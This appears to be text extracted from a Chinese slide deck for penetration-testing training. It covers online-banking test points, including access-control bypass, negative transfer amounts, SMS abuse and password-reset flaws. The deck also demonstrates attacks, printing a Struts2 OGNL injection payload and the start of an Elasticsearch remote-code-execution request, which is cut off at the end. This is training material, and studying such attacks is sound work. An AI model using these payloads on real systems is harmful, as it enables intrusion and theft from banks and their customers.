信息安全技术培训渗透测试.ppt

—— 渗透测试、演示 某商行网银渗透测试结果 某商行APP渗透测试结果 DEMO 其他方向 设计缺陷 弱口令 未授权访问 敏感信息 网络渗透 环境配置不合理 致命危害 权限绕过 拓扑图泄露 识别分析与利用 安全测试 应用系统漏洞测试点 --业务复杂 容易产生业务的逻辑安全问题 --问题ALL输入测试 测试方法：提交恶意参数，观察返回结果 权限控制漏洞 最常见和最普遍的漏洞，重点测试 通过越权的查询操作可导致未授权的用户直接访问不应用访问的资源，导致一些敏感信息的泄露，其中包括 查询其他账户余额 查询其他账户积分 查询其他账户身份信息 查询其他账户的其他相关信息 安全测试 安全测试 应用系统漏洞测试点 --安全控件测试 使用ComRaider测试ActiveX控件 安全密码控件是否有防键盘记录功能 登录点测试 加密控件是否有对密码进行加密 企业网银绕过key保护 安全测试 应用系统漏洞测试点 数据校验问题 使用提交异常数据进行测试 提交负数/超大转账金额 提交负数/超大积分 账户控制 积分转换输入输出账户互换 转账输入输出账户互换 安全测试 应用系统漏洞测试点 短信测试 大部分网银都有短信功能，网银的短信接口是否存在短信DOS攻击， 伪造短信发送 安全测试 应用系统漏洞测试点 其他测试 是否有登陆暴力破解 认证漏洞 安全测试 应用系统漏洞测试点 系统测试 扫描器扫描NMAP/Nessus/NexPose系统漏洞； DB扫描、弱口令、补丁、权限划分； 中间件测试，如Weblogc/WebSphere/Jboss等； Hacking 逻辑错误 Hacking 逻辑错误 一个密码找回的逻辑错误 Hacking 逻辑错误 修改任意账号密码 什么是渗透测试 应用程序渗透测试方法 互联网攻击常见手段 金融行业安全测试 互联网攻击 常见的 Django Cacti 0day Freenas Hudson Squid Beanshell Zabbix Jboss … 互联网攻击 互联网攻防Struts演示 如何利用Struts进入你的服务器 ?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29} 互联网攻击 互联网攻防Struts演示 互联网攻击 互联网攻防Struts演示 梦网合作自助服务 12590远程代码执行 互联网攻击 互联网攻防Struts演示 移动学院 互联网攻击 互联网攻防Heartbleed OpenSSL1.0.1、1.0.1a 、1.0.1b 、1.0.1c 、1.0.1d 、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等版本 互联网攻击 互联网攻防Splunk XSS OpenSSL TLS心跳信息泄漏漏洞 未授权访问 代码执行 互联网攻击 互联网攻防Splunk 代码执行 互联网攻击 互联网攻防SAP漏洞演示 SAP NetWeaver 是基于专业标准的集成化应用平台，能够大幅度降低系统整合的复杂性。其组件包括门户、应用服务器、商务智能解决方案以及系统整合和数据整合技术。 互联网攻击 互联网攻防Hadoop 通过hadoop,hbase，hdfs0.2 RC版本的管理web端能远程执行命令，通过该节点对集群服务器进行任务分发（该是基本功能，当然可以进行批量提权linux主机）渗透进hadoop集群。 互联网攻击 互联网攻防Elasticsearch :9200/_search?source={%22size%22:1,%22query%22:{%22 filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fi elds%22:{%22exp%22:{%22script%22: